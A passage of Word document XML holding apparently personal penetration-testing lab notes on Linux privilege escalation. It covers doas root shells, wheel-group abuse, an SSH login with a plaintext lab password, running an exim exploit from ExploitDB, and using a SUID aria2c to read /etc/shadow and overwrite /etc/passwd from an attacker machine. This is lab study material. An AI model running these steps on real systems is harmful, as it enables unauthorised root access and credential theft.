      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the shell is weak and hard to upgrade. But if you want to priv esc on www-data, here it is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002237">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002238">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 Alternatively, if we want a stronger shell (although it might be stronger in your case if you're doing another box) we can add andrew to wheel since it has stronger SSH connection. And adding him to the wheel group allows how to run doas as a root for any command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002239">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The line in the config file that that says that any wheel member can run doas as root is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This says any wheel member can run doas as root and no password required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the lack of the word "as michael" or something like that means it defaults to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas pw usermod andrew -G wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on www-data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000223F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But warning: this replaces the user’s group memberships — it doesn't append.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002240">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if andrew was part of other groups, they’ll be removed unless you include them. In this case it didn't matter though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002241">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002242">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Then after you add it, you can run either on andrew to get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas csh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this doesn't work, try not adding the full path to doas and just run "doas" without any path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starts a root shell using C Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a lot more interactive than weak /bin/sh unless you update it to python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002248">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Then, go look at all the hidden files in /home/mountuser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002249">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of .history file is credentials for SSH for mountuser on .121</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83"/>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sshpass -p "DRtajyCwcbWvH/9" ssh mountuser@172.16.10.21</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c753kmj1ud02" w:id="300"/>
      <w:bookmarkEnd w:id="300"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen-4.5.0 with SUID bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A .143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000224F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002250">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at XXXXXXXXX-A writeup since there were a lot of error while compiling the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002251">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002252">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1b73j617motb" w:id="301"/>
      <w:bookmarkEnd w:id="301"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exim-4.84-3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002253">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/exim-4.84-3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the Tib3rius Video. There was an exploit on exploitDB, which was ExploitDB 39535. And when they ran the exploit, they got this error about ^M. To fix it, do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002254">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -e "s/^M//" 39535.sh &gt; privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002255">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then execute the new file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002256">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod + privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002257">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002258">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="828"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///C:/Users/Micha/Downloads/Linux%20Privilege%20Escalation-1.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002259">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g2p68pab8t16" w:id="302"/>
      <w:bookmarkEnd w:id="302"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aria2c (/usr/bin/aria2c)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId731">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Assertion101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/aria2c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had a SUID Bit set. LinPeas highlighted this in yellow, and the text was in red. But, the exploit on GTFOBins didn't work. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000225F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We noticed that we could run this command to read ANY file, including /etc/shadow, meaning that it must have been running as root, since only root can read /etc/shadow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="813"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -i &lt;any file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002261">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002262">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And so, we also found that /usr/bin/aria2c could overwrite files via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">files. So, we can get a copy of the /etc/passwd, upload it to local kali, add a root user, and then use aria2c to overwrite it's own /etc/passwd with a new /etc/passwd sitting in our local kali, so it will be a remote file since it's not on the target machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002263">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002264">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to reproduce:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002265">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste the /etc/passwd on target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002266">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/aria2c -i /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002267">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can read the /etc/passwd this way or you can try using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
